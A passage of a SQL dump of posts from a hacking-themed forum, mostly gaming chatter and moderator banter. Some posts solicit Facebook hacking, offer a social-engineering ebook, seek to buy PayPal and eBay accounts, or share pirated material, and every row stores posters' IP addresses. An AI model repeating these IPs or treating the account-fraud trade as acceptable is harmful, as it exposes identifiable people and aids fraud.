we can arrange something :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9e91c6b34563ce26f1fabe9f4a6bd7ac', '0', '0'); INSERT INTO mybb_posts VALUES('4743', '875', '4739', '3', 'RE: New LH Avatars', '0', '222', 'Exposé', '1350276353', 'Wanna make me one :P...idk what would be in the avatar but yeh....:P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'cf44e3cc70e4915818d89ee11411adf0', '0', '0'); INSERT INTO mybb_posts VALUES('4744', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '257', 'XxTREYZxX', '1350276589', 'i think they need to upgrade their security settings.', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'd93bf40c124b04b69c48c0a805ab0dac', '0', '0'); INSERT INTO mybb_posts VALUES('4745', '868', '4710', '71', 'RE: whats the best COD', '0', '257', 'XxTREYZxX', '1350276928', 'same i think mw3 because its multiplayer is great or i\'m just good', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', 'f1459ed4531fbcd1997bb8b658561169', '0', '0'); INSERT INTO mybb_posts VALUES('4746', '834', '4377', '64', 'RE: The Marine DVDrip', '0', '257', 'XxTREYZxX', '1350277191', 'yeah i\'v seen this movie its great i really like it. i\'m gonna download it for the collection.:)', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', '57479bb2a241f65f9312e5d995b0823b', '0', '0'); INSERT INTO mybb_posts VALUES('4747', '877', '0', '11', 'could some one teach how to hack facebook tetrisfreinds', '0', '257', 'XxTREYZxX', '1350278405', 'title says it all hopefully some knows how to.', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '0d944e3ec2ce1034ac92289f1679aa01', '0', '0'); INSERT INTO mybb_posts VALUES('4748', '878', '0', '16', 'ƒ???????????g\'s Dell SE Method....', '0', '222', 'Exposé', '1350283397', 'If anyone is interested in my Dell SE Method ebook that I made a while ago....you can pm me and I will give you the link....only sharing this with the first 5 members....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5b65250f5efdf7bdffb0d2d2b483be9f', '0', '0'); INSERT INTO mybb_posts VALUES('4749', '878', '4748', '16', 'RE: ƒ???????????g\'s Dell SE Method....', '0', '257', 'XxTREYZxX', '1350288533', 'yeah im interested thanks man.', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'b374da7139743d55c30808eb74518700', '0', '0'); INSERT INTO mybb_posts VALUES('4750', '879', '0', '9', 'could some one teach how to make money on a site.', '0', '257', 'XxTREYZxX', '1350290641', 'hey lh,\r\ncan some one teach me how to make money on the internet thank you,', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '2a31e798e8cfed504e15478b3765e7bd', '0', '0'); INSERT INTO mybb_posts VALUES('4751', '875', '4739', '3', 'RE: New LH Avatars', '0', '205', 'mothered', '1350298268', 'I don\'t see anything wrong with them.\r\n\r\nLooking forward to seeing the rest, when they\'re available.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5af63f2007e45d9f243dbabf27eb88cd', '0', '0'); INSERT INTO mybb_posts VALUES('4752', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '205', 'mothered', '1350298529', 'I agree with the above, to have a laugh and post fake details.\r\n\r\n\"FB is a useless site but good for advertising\". Well said Timmy :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '078f3e6ea781a6bd51ddd66656afad2e', '0', '0'); INSERT INTO mybb_posts VALUES('4753', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1350301059', 'I voted already.\nLooooool\n:D One of the votes are mine.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c13ed5ba783f1e574d22afc5ecefc1a2', '0', '0'); INSERT INTO mybb_posts VALUES('4754', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350301085', 'I don\'t think we do MOTMs here. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b3ff55f3d90ba7b9e8edb514932acbbe', '0', '0'); INSERT INTO mybb_posts VALUES('4755', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350301117', 'I use DarkMystic 3.3\nAnd also BotQuestWorlds 1.8 :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'abded0e4b8eb59aae6a7164f23a5b1bc', '0', '0'); INSERT INTO mybb_posts VALUES('4756', '867', '4709', '71', 'RE: Fifa 13', '0', '82', 'iTzIpod', '1350301150', 'I wanna play it.\nLooks fun.\nNever played a Fifa game before :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cdea07aa327b5ad14fd296de3e927680', '0', '0'); INSERT INTO mybb_posts VALUES('4757', '869', '4712', '74', 'RE: who loves counter strike', '0', '82', 'iTzIpod', '1350301177', 'I\'d prefer Combat Arms :3\nI like it better than Counter Strike.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ad7b5ad2bf46e6df8ed78356c9909a2c', '0', '0'); INSERT INTO mybb_posts VALUES('4758', '875', '4739', '3', 'RE: New LH Avatars', '0', '82', 'iTzIpod', '1350301266', 'I didn\'t say I didn\'t like it or anything... -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '37368b037f81d3340d3fcd14419fb88d', '0', '0'); INSERT INTO mybb_posts VALUES('4759', '876', '4742', '7', 'RE: Anyone have a paypal + ebay I can buy off you?', '0', '82', 'iTzIpod', '1350301293', 'I know someone that owns a Paypal Account + eBay account with 1k+ rep?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4c235aecc1e1b43719608b900eba4013', '0', '0'); INSERT INTO mybb_posts VALUES('4760', '496', '2408', '14', 'RE: Free Proxy List', '0', '82', 'iTzIpod', '1350301340', 'Send me the one you use.. :D Thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'db29cab4f2d93ad491ef9dc50ce61c1c', '0', '0'); INSERT INTO mybb_posts VALUES('4761', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1350302177', 'Reloadzor -.- Where are you...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb8eaab4992bb8adc80b02e364f509d2', '0', '0'); INSERT INTO mybb_posts VALUES('4762', '875', '4739', '3', 'RE: New LH Avatars', '0', '3', '??????????¢™', '1350310473', 'Damnn that is sick AF, I like how it changes everytime you refresh. Mind making me one?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '3a94188b56255acdc185125b67a3f974', '0', '0'); INSERT INTO mybb_posts VALUES('4763', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '100', '??zg???g????61', '1350315588', 'Awesome job so far ;D but we\'re only a little bit of the way up the mountain', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '351288e16ea86ec86ed2f616fb0743f3', '0', '0'); INSERT INTO mybb_posts VALUES('4764', '879', '4750', '9', 'RE: could some one teach how to make money on a site.', '0', '100', '??zg???g????61', '1350315834', 'This is an unnecessary thread... There are a bunch of methods already in this section...', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'a6a464d1219535aecdd24d0c58e82e13', '0', '0'); INSERT INTO mybb_posts VALUES('4765', '880', '0', '9', '[eBook] How to make a fortune by playing Fifa ($65 eBook) [ONLY $3!]', '0', '100', '??zg???g????61', '1350316371', 'Hey everyone, I just came across a $65 eBook. Even better is that I got the version with resell rights! :D Yep so I know this is kinda cheep of me, but since its a $65 eBook with resell rights, I\'m going to sell it for $3. Post here if you want it and I\'ll PM you with further instructions. Thanks everyone!', '96.237.179.21', '1626190613', '1', '0', '100', '1350349214', '1', 'e3694b23da9e3722afcafd84a4ae734b', '0', '1350349214'); INSERT INTO mybb_posts VALUES('4766', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '53', 'sirchamp', '1350319227', 'Pretty nice what we have already reached. I think the biggest.problem is that when you searcch for this forum on google and click the first page, an error comes.\n\n\n//posting this in Austria with my ipad.sorry for all the mistakes', '91.112.114.162', '1534096034', '1', '0', '0', '0', '1', '3083e41af91d379a8c7fd762124d2d9d', '0', '0'); INSERT INTO mybb_posts VALUES('4767', '880', '4765', '9', 'RE: [FREE] How to make a fortune by playing Fifa [LEAKED]', '0', '53', 'sirchamp', '1350319434', 'Why don\'t u resell it then?? Thanks a million for this :D', '91.112.114.162', '1534096034', '1', '0', '53', '1350319453', '1', '7217d7857c3464432dbfcb29681abfcf', '0', '1350319453'); INSERT INTO mybb_posts VALUES('4768', '880', '4765', '9', 'RE: [FREE] How to make a fortune by playing Fifa [LEAKED]', '0', '62', 'R?????zo?', '1350319936', 'Thanks for this bro, I will give it a look :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6b6e9cc052b5a6d011bca9f605a5d721', '0', '0'); INSERT INTO mybb_posts VALUES('4769', '875', '4739', '3', 'RE: New LH Avatars', '0', '62', 'R?????zo?', '1350321599', 'that\'s really cool that changes everytime you refresh :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '30024a00c1192aebd44873b390ac9c93', '0', '0'); INSERT INTO mybb_posts VALUES('4770', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '62', 'R?????zo?', '1350321704', 'Hmm I can give this a try, but I don\'t know what do add though :P\nwell that\'s when I have free time, im short on time atm.', '94.132.244.168', '1585771688', '1', '0', '62', '1350321767', '1', '9da45be4986fc4696115c3759b1288db', '0', '1350321767'); INSERT INTO mybb_posts VALUES('4771', '496', '2408', '14', 'RE: Free Proxy List', '0', '62', 'R?????zo?', '1350321853', 'I\'d like that adf.ly bot too :P\nOn topic: thanks for the list :)', '94.132.244.168', '1585771688', '1', '0', '62', '1350321868', '1', 'cf63c3afab8bb936b308fb038b362fd1', '0', '1350321868'); INSERT INTO mybb_posts VALUES('4772', '878', '4748', '16', 'RE: ƒ???????????g\'s Dell SE Method....', '0', '62', 'R?????zo?', '1350321928', 'I\'m interested, thanks alot bro.\nPm\'ing you right now :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3a66ccaf07e81f2044169fcc7a261bc9', '0', '0'); INSERT INTO mybb_posts VALUES('4773', '868', '4710', '71', 'RE: whats the best COD', '0', '62', 'R?????zo?', '1350322109', 'well I play CoD since COD1 and I think COD1 and COD2 was the best one so far, I mean multiplayer ofcourse.\nAs for singleplayer I really liked mw3.\n\nsorry if I\'m oldschool :/', '94.132.244.168', '1585771688', '1', '0', '62', '1350322123', '1', '5feb5a0cda596531e9981d67adc21fb4', '0', '1350322123'); INSERT INTO mybb_posts VALUES('4774', '821', '4733', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '62', 'R?????zo?', '1350322179', '[quote=\'Timmy\' pid=\'4733\' dateline=\'1350274047\']\r\n[quote=\'t3h jok3r\' pid=\'4578\' dateline=\'1350194065\']\r\nLol Greed.\r\n\r\nOT: I\'m thinking if I should drink water now or after I\'m done checking my emails.\r\n[/quote]\r\n\r\nThis right here is the best answer on this thread.\r\n[/quote]\r\n\r\nHaha agreed :P\r\nI think you should drink after it though :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ba86e9074161d66000299c44543b3e1f', '0', '0'); INSERT INTO mybb_posts VALUES('4775', '881', '0', '35', 'Which Signature Is Better ? | Rate My Graphics !!!', '17', '228', 'VirtualLegend', '1350322703', '[color=#32CD32][size=medium][align=center]Hello LH Members,\r\n\r\nI have made two signatures today and i want one signature as my LH Signature but i can\'t choose. Also Give me Tips !!!!\r\n\r\nFirst Signature That i made was this one:\r\n[img]http://i.imgur.com/48CAr.jpg[/img]\r\n\r\n\r\nSecond Signature that i made was this one:\r\n[img]http://i.imgur.com/FmG4b.jpg[/img]\r\n\r\nBe really honest what do you think about my work and give me Tips !!!\r\n[/align][/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd780d10b4ae7af72d81478bf0bfac681', '0', '0'); INSERT INTO mybb_posts VALUES('4776', '876', '4742', '7', 'RE: Anyone have a paypal + ebay I can buy off you?', '0', '222', 'Exposé', '1350324921', 'Would they want to sell the account?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b50a04e3e31da7b27cd85402441b7e50', '0', '0'); INSERT INTO mybb_posts VALUES('4777', '882', '0', '9', '[ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '228', 'VirtualLegend', '1350327955', '[color=#32CD32][align=center][size=medium]Hello LH Members,\r\n\r\nToday I Have a Wonderfull Product for you People. Named \'Google Sniper 2.0\'. Google Sniper 2.0 is a step by step video tutorial on how to make and increase your earnings on Clickbank and other CPA networks. \r\n\r\n[u][i][b]Google Sniper 2.0 Info:[/b][/i][/u]\r\nName: Google Sniper 2.0\r\nCreator: George Brown\r\nMain Focus: Affiliate Marketing\r\nLaunch Date: February 14th, 2011\r\nRegular Price: $47\r\nOfficial Website: http://gsniper2.com/\r\n\r\n[img]http://cdn.dbpmarketing.com/wp-content/uploads/2010/10/Google-Sniper-2.jpg[/img]\r\n\r\nTo get this Product Leave a Comment Below that you want it, and i will send you the Download Link. It\'s a huge file and the reason that I don\'t give the DL is because i want this thread to be alive for a while , so that other people will see this thread\r\n\r\n[color=#FFD700][color=#32CD32][size=x-large]Download Link: https://www.dropbox.com/sh/brzin7t6f6v97gw/3k6aWOj8-6[/size][/color][/color]\r\n\r\nPEACE OUT !!!\r\n\r\n[/size][/align][/color]', '83.83.167.183', '1397991351', '1', '0', '228', '1350575719', '1', 'e8e0a4a58bbaeb96cc32a680a4c7d5a3', '0', '1350575719'); INSERT INTO mybb_posts VALUES('4778', '875', '4739', '3', 'RE: New LH Avatars', '0', '82', 'iTzIpod', '1350328734', 'Thanks though.\nI\'ll change it when I have the time. :p\nDon\'t change it for me. I need to save my Image.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6b1d9df72d78c53bfcea4db74cb1c89d', '0', '0'); INSERT INTO mybb_posts VALUES('4779', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1350328761', 'Okay. Thanks. Download the .PSD File :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1c28fbe38f3440e51115ea53027e9c5b', '0', '0'); INSERT INTO mybb_posts VALUES('4780', '881', '4775', '35', 'RE: Which Signature Is Better ? | Rate My Graphics !!!', '0', '82', 'iTzIpod', '1350328799', 'I like the 2nd one better.\nCould add a Black Border around it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6a47e48bec90f6ce88ed5d4cbd4d77fa', '0', '0'); INSERT INTO mybb_posts VALUES('4781', '876', '4742', '7', 'RE: Anyone have a paypal + ebay I can buy off you?', '0', '82', 'iTzIpod', '1350328816', 'Let me ask. I forgot :/ I think so yes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '69441dbd72f6880ff792908f03c85e2c', '0', '0'); INSERT INTO mybb_posts VALUES('4782', '881', '4780', '35', 'RE: Which Signature Is Better ? | Rate My Graphics !!!', '0', '228', 'VirtualLegend', '1350329117', '[quote=\'iTzIpod\' pid=\'4780\' dateline=\'1350328799\']\r\nI like the 2nd one better.\r\nCould add a Black Border around it?\r\n[/quote]\r\n\r\nThanks For the Feedback', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4403fccdfa9275e690e359aa4c0e06a3', '0', '0'); INSERT INTO mybb_posts VALUES('4783', '875', '4762', '3', 'RE: New LH Avatars', '0', '1', 't3h jok3r', '1350329358', '[quote=\'ƒ???????????g\' pid=\'4743\' dateline=\'1350276353\']\r\nWanna make me one :P...idk what would be in the avatar but yeh....:P\r\n[/quote]\r\n\r\nIf you want one then just tell me what do you want the avatar to be about :)\r\n\r\n[quote=\'??????????¢™\' pid=\'4762\' dateline=\'1350310473\']\r\nDamnn that is sick AF, I like how it changes everytime you refresh. Mind making me one?\r\n[/quote]\r\n\r\nAF? You sir will be demoted in 2 seconds and 1 millisecond.\r\n\r\n[quote=\'iTzIpod\' pid=\'4778\' dateline=\'1350328734\']\r\nThanks though.\r\nI\'ll change it when I have the time. :p\r\nDon\'t change it for me. I need to save my Image.\r\n[/quote]\r\n\r\nCool PM me for the link when you want it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8d4c64f18bb56ced886d32b79fa791f4', '0', '0'); INSERT INTO mybb_posts VALUES('4784', '883', '0', '7', 'Congratz virtual', '0', '4', 'Triple H', '1350329533', 'Congratz virtuallegend i just noticed that you become mod. I wonder how he became mod :?:', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0729f091ec2567b677db45638971c16b', '0', '0'); INSERT INTO mybb_posts VALUES('4785', '331', '1545', '5', 'RE: New Rules and Instructions v.4', '0', '1', 't3h jok3r', '1350330002', 'Welcome back and updated the thread. Added Advertising rule.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b0775af5a0eecc9e23c2cc05ed893d9f', '0', '0'); INSERT INTO mybb_posts VALUES('4786', '328', '1533', '48', 'RE: Mod Notice in threads', '0', '228', 'VirtualLegend', '1350330679', 'Seems Awesome and Easy :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '713bf4f445cdb3a018d3cd5e418c05bc', '0', '0'); INSERT INTO mybb_posts VALUES('4787', '115', '290', '48', 'RE: [tut] How to Moderate LH as a MOD', '0', '228', 'VirtualLegend', '1350330893', 'Nice Tutorial/Guide Hoping to see more of them', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd5ef632f32d71a06945ce6eda5c03595', '0', '0'); INSERT INTO mybb_posts VALUES('4788', '875', '4739', '3', 'RE: New LH Avatars', '0', '222', 'Exposé', '1350331514', 'DEMOTE HIMMMMMMM. Lmao.....just kidding', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'eb327e344ed65bc73176d20d280ed630', '0', '0'); INSERT INTO mybb_posts VALUES('4790', '861', '4766', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1350334997', '[quote=\'sirchamp\' pid=\'4766\' dateline=\'1350319227\']\r\nPretty nice what we have already reached. I think the biggest.problem is that when you searcch for this forum on google and click the first page, an error comes.\r\n\r\n\r\n//posting this in Austria with my ipad.sorry for all the mistakes\r\n[/quote]\r\n\r\nHow I didn\'t even know that. I will create a redirect, that\'s bad SEO. Thanks for reporting.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6d6c918f111e0e9a1f0fe7c964350e8a', '0', '0'); INSERT INTO mybb_posts VALUES('4791', '515', '4753', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1350335352', '[quote=\'iTzIpod\' pid=\'4753\' dateline=\'1350301059\']\r\nI voted already.\r\nLooooool\r\n:D One of the votes are mine.\r\n[/quote]\r\n\r\nI remember you voting, it was like the 5th vote or something.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f6393d2d59e559e714e2b0f81fc6173a', '0', '0'); INSERT INTO mybb_posts VALUES('4792', '864', '4640', '79', 'RE: Need some coder to check this code', '0', '1', 't3h jok3r', '1350335647', 'Umm so you think the script is clean?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '64bc1c6002680b3216611b0da01a0521', '0', '0'); INSERT INTO mybb_posts VALUES('4793', '875', '4739', '3', 'RE: New LH Avatars', '0', '1', 't3h jok3r', '1350336613', 'Added 3 more avatars in the spoiler which can be found in the OP.\n\nEnjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cd78cb235b8ec8424dcf84aa1a032d24', '0', '0'); INSERT INTO mybb_posts VALUES('4794', '869', '4712', '74', 'RE: who loves counter strike', '0', '2', 'Apathy', '1350337772', 'I just finished playing CSS.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '306caeb31d788913f4abca41c7d2b25a', '0', '0'); INSERT INTO mybb_posts VALUES('4795', '884', '0', '2', 'Testing new Mycodes', '0', '1', 't3h jok3r', '1350338202', '[b]Google Search Mycode[/b]\n\n[gsearch]L33T Hacking[/gsearch]\n\n[code]\n[gsearch]L33T Hacking[/qsearch]\n[/code]', '72.231.24.165', '1223104677', '1', '0', '1', '1350338211', '1', 'a47f376d507c9ee9dd07bc23c7c64ded', '0', '1350338211'); INSERT INTO mybb_posts VALUES('4796', '884', '4795', '2', 'RE: Testing new Mycodes', '0', '1', 't3h jok3r', '1350338325', '[b]Highlight Text[/b]\n\n[hl=Yellow]Hi there[/hl]\n\n[code]\n[hl=Yellow]Hi there[/hl]\n[/code]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bfbb961828f787b5e1272a3d3c000950', '0', '0'); INSERT INTO mybb_posts VALUES('4797', '875', '4783', '3', 'RE: New LH Avatars', '0', '3', '??????????¢™', '1350339753', '[quote=\'t3h jok3r\' pid=\'4783\' dateline=\'1350329358\']\r\n[quote=\'ƒ???????????g\' pid=\'4743\' dateline=\'1350276353\']\r\nWanna make me one :P...idk what would be in the avatar but yeh....:P\r\n[/quote]\r\n\r\nIf you want one then just tell me what do you want the avatar to be about :)\r\n\r\n[quote=\'??????????¢™\' pid=\'4762\' dateline=\'1350310473\']\r\nDamnn that is sick AF, I like how it changes everytime you refresh. Mind making me one?\r\n[/quote]\r\n\r\nAF? You sir will be demoted in 2 seconds and 1 millisecond.\r\n\r\n[quote=\'iTzIpod\' pid=\'4778\' dateline=\'1350328734\']\r\nThanks though.\r\nI\'ll change it when I have the time. :p\r\nDon\'t change it for me. I need to save my Image.\r\n[/quote]\r\n\r\nCool PM me for the link when you want it.\r\n[/quote]\r\n\r\nAF means As Fuck dude.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5d359450d71891afc2c281adedf13519', '0', '0'); INSERT INTO mybb_posts VALUES('4798', '729', '4516', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1350339948', '[quote=\'iTzIpod\' pid=\'4516\' dateline=\'1350157358\']\r\nThere was a way to delete this.\r\nMy friend told me how. But I forgot. \r\n\r\nSomething to do with %appdata% though.\r\n[/quote]\r\n\r\nYes you gotta go into your PC Hard Drive or whatever and look for something to do with appdata.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'b5ffb76c2f032814289b646f0b54e46a', '0', '0'); INSERT INTO mybb_posts VALUES('4799', '115', '290', '48', 'RE: [tut] How to Moderate LH as a MOD', '0', '3', '??????????¢™', '1350340504', 'I will follow this tut. \nOff-Topic: Who is VirtuealLegend? Only has 18 posts and joined about a week ago and is already a mod? Hmmm.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5e8e44843f5b555e01b19e5b9a75921a', '0', '0'); INSERT INTO mybb_posts VALUES('4800', '780', '4024', '17', 'RE: Ultimate eWhoring Guide ? Never Seen Before ? $800/week! ?', '0', '228', 'VirtualLegend', '1350341367', 'Thanks for the Nice Share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ed06c76f9d9dfdbc68a1636c28eb5c44', '0', '0'); INSERT INTO mybb_posts VALUES('4801', '878', '4748', '16', 'RE: ƒ???????????g\'s Dell SE Method....', '0', '228', 'VirtualLegend', '1350341450', 'I\'m Very Intrested Could you send me a Copy ?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b36be4485da7fe61ef6d385bca41322b', '0', '0'); INSERT INTO mybb_posts VALUES('4802', '883', '4789', '7', 'RE: Congratz virtual', '0', '61', 'NXK', '1350343491', '[quote=\'ƒ???????????g\' pid=\'4789\' dateline=\'1350333180\']\nEveryone gettin Supermod but me.....:rage:\n[/quote]\n\nHe\'s a normal mod, I\'m a Supermod.\n\nAnd we\'ve been talking about promoting him for a while, He is a very high quality user and Will deditcate alot of time to Help us grow.', '99.253.94.204', '1677549260', '1', '0', '61', '1350343537', '1', '496ea5b029c8982d3104454d4b318804', '0', '1350343537'); INSERT INTO mybb_posts VALUES('4803', '883', '4784', '7', 'RE: Congratz virtual', '0', '82', 'iTzIpod', '1350344771', 'How come I don\'t get promoted to SMod? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3f864934b9479d83554dc44cfe5f5c63', '0', '0'); INSERT INTO mybb_posts VALUES('4819', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350352739', '/Request Thread Closed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4471573d6ec80adb1fff1638cc115ae6', '0', '0'); INSERT INTO mybb_posts VALUES('4805', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1350344861', 'Lol. I voted yesterday. You can vote every 24 hours.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2fbbda9c2040161887f02b58ef5eb967', '0', '0'); INSERT INTO mybb_posts VALUES('4809', '868', '4710', '71', 'RE: whats the best COD', '0', '228', 'VirtualLegend', '1350347588', 'I Like Black Ops cuz of the Zombie Mode\nBut MW3 is now my favorite\n\nBut on 13/11/2012 is Black Ops 2 my favorite COD game', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'dfc49a5c23493288dfec26fe22acd71c', '0', '0'); INSERT INTO mybb_posts VALUES('4807', '883', '4784', '7', 'RE: Congratz virtual', '0', '228', 'VirtualLegend', '1350346527', 'Thanks Triple H, I Will do my best to help LH Forum :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f34405264f14c70bdb732b4299511a3e', '0', '0'); INSERT INTO mybb_posts VALUES('4808', '871', '4715', '65', 'RE: What\'s Your Top 3 Movies?', '0', '228', 'VirtualLegend', '1350346828', 'My Top 3:\n1. Iron Man\n2. Iron Man 2\n3. Limitless', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '23aafee18f57231895180a6fb5ec37db', '0', '0'); INSERT INTO mybb_posts VALUES('4810', '868', '4710', '71', 'RE: whats the best COD', '0', '257', 'XxTREYZxX', '1350347649', 'nhaa thats all good so yeah', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '287bd6b5ecf65bb769e3f21c872a1520', '0', '0'); INSERT INTO mybb_posts VALUES('4811', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350348003', 'ohh thats sucks i ask the admin', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '607099283251278cf5d4326a97248b89', '0', '0'); INSERT INTO mybb_posts VALUES('4812', '885', '0', '71', 'Who Has Already Pre-Ordered Black Ops 2 ?', '0', '228', 'VirtualLegend', '1350348181', '[color=#32CD32][align=center][i][size=medium]Wazup Gamers,\r\n\r\nI can\'t wait to get the new Black Ops 2. I have already played it at the first look AND IT WAS AWESOME + DOUTZEN KROES WAS THE BOOTH BABE THERE. \r\n\r\nI have Pre-ordered black ops 2 hardened edition. That includes a few Double XP coins and Nuketown as a ZOMBIE MAP !!!!. I\'m a Hardcore gamer, so that\'s why I\'m getting the Hardened Edition.\r\n\r\nBut What About YOU?[/size][/i][/align][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '002ba9d4625f3989d6c7fa226b3b7ed7', '0', '0'); INSERT INTO mybb_posts VALUES('4813', '882', '4777', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '100', '??zg???g????61', '1350348459', 'Could I have the download? Thanks in advance man!', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'cda153d32930467d780ddb680c91f364', '0', '0'); INSERT INTO mybb_posts VALUES('4814', '880', '4765', '9', 'RE: [FREE] How to make a fortune by playing Fifa [LEAKED]', '0', '100', '??zg???g????61', '1350348858', 'Your right haha, edited my thread :D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '7f0f7f23a51b9734a2cd4272aa5326c5', '0', '0'); INSERT INTO mybb_posts VALUES('4815', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '100', '??zg???g????61', '1350349549', 'Hey If I could have this that would be AMAZING. I could really use this. ;-p', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '900dcd9494cb0ee95b194f5406878f0a', '0', '0'); INSERT INTO mybb_posts VALUES('4816', '885', '4812', '71', 'RE: Who Has Already Pre-Ordered Black Ops 2 ?', '0', '257', 'XxTREYZxX', '1350349696', 'yeah so i have i i preordered the care package edition', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '2a94081a47050d0a7304d69fb59138fa', '0', '0'); INSERT INTO mybb_posts VALUES('4817', '882', '4813', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '228', 'VirtualLegend', '1350349825', '[quote=\'??zg???g????61\' pid=\'4813\' dateline=\'1350348459\']\r\nCould I have the download? Thanks in advance man!\r\n[/quote]\r\n\r\nI have Send You the Download Link \r\n\r\nGood Luck (y)', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '494b45e09baffce51800586ec0653641', '0', '0'); INSERT INTO mybb_posts VALUES('4818', '885', '4816', '71', 'RE: Who Has Already Pre-Ordered Black Ops 2 ?', '0', '228', 'VirtualLegend', '1350349927', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'4816\' dateline=\'1350349696\']\r\nyeah so i have i i preordered the care package edition\r\n[/quote]\r\n\r\nThats Even More Awesome \r\n\r\nI Bet You Will troll People with the Helicopter Toy :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e31a6d3a43d00722600f46762e471bad', '0', '0'); INSERT INTO mybb_posts VALUES('4820', '886', '0', '35', 'My logo', '0', '257', 'XxTREYZxX', '1350352852', 'hey l33T, whats up \r\ni was just wondering if you\'s like my logo.next to my name', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '0d55c8264fc411a896d0ac9b860c5809', '0', '0'); INSERT INTO mybb_posts VALUES('4821', '883', '4803', '7', 'RE: Congratz virtual', '0', '1', 't3h jok3r', '1350353004', 